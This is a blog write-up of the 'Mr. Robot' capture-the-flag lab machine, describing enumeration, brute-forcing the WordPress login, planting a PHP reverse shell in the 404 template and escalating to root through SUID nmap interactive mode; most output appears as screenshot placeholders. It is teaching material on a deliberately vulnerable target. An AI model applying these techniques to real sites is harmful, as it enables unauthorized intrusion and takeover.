Safetech Blog - Security Tips and Tricks


by Oana Stoian

Mr. Robot Write-up

Being a fan of the series Mr.Robot, I decided to exploit this vulnerable machine added by Jason.

Someone once said that the best way to be prepared for a hack when it happens, is to be hacked. So, let’s hack Mr. Robot 🙂

Starting with enumeration, I fired-up nikto, that reveals a lot of useful information:

nikto

 

I’ve tried also nmap, but the opened ports are only on 80 and 443. No sneaky port here.

nmap

Checking the results of nikto, reveals that on this machine is a file robots.txt. Need to verify this…and..voilà:

robots

Key-1-of-3 seems to be our first flag 🙂

I’ve saved the dictionary locally, maybe later it will be useful for a brute force or something. Add in the URL / key-1-of-3.txt and received the content of the file: 073403c8a58a1f80d943455fb30724b9

file txt content

But nikto revealed also a /wp-login.php  and had to see what I can get from it.

wp_login

Let’s try some usernames and passwords. Thinking of the characters from the serial, I’ve checked for Mr Robot, and after that for Elliot. The result is awesome, taking into consideration that was the second shot for the username:

user elliot

Seems that the password I entered is incorrect. First thing in mind: brute force with Intruder.

Running wpscan to enumerate the users will not work this time, but we can use wfuzz for this.

First we will optimize the dictionary file fsociety.dic as is full of duplicates:

cat fsocity.dic|sort| uniq > mr_robot.dic

Next, we will start wfuzz wich will try all the words in the dictionary file in about 3 minutes:

wfuzz

Brute-forcing the user elliot with Burp Intruder will give us the password:

password

After logging into the wordpress administrative interface we need to find something else to get to the second flag.

One of the most common ways to execute commands while having administrator rights in wordpress is to try to upload a PHP file or insert some PHP code into one of the template`s files.  Go to Apperence > Editor, and on the right of the page choose 404 Template, and insert here the PHP code that will initiate a reverse-connection back to our kali machine.

We continue by doing some enumeration, like finding what users are present on the system:

users

We notice the user robot and we find in his home directory our next hint:

md5

By doing a quick look-up on google with the MD5 hash, we have now what it seems to be the password for robot user. This will take us to the second flag:

flag2

Now it’s time for some more enumeration in order to escalate our privileges to root.

Looking for files with special permissions will return as nmap among other files:

suid

We remember an article from Go Null Yourself e-zine called Stupid shell tricks which can be found here: https://www.exploit-db.com/papers/18168/ where nmap interactive mode is mentioned as a mean of backdooring a system and we try to exploit this “feature”:

nmap_interactive

Challenge done! The third flag was discovered.

 

 

 

2,785 total views, 2 views today





Leave a Reply

Your email address will not be published. Required fields are marked *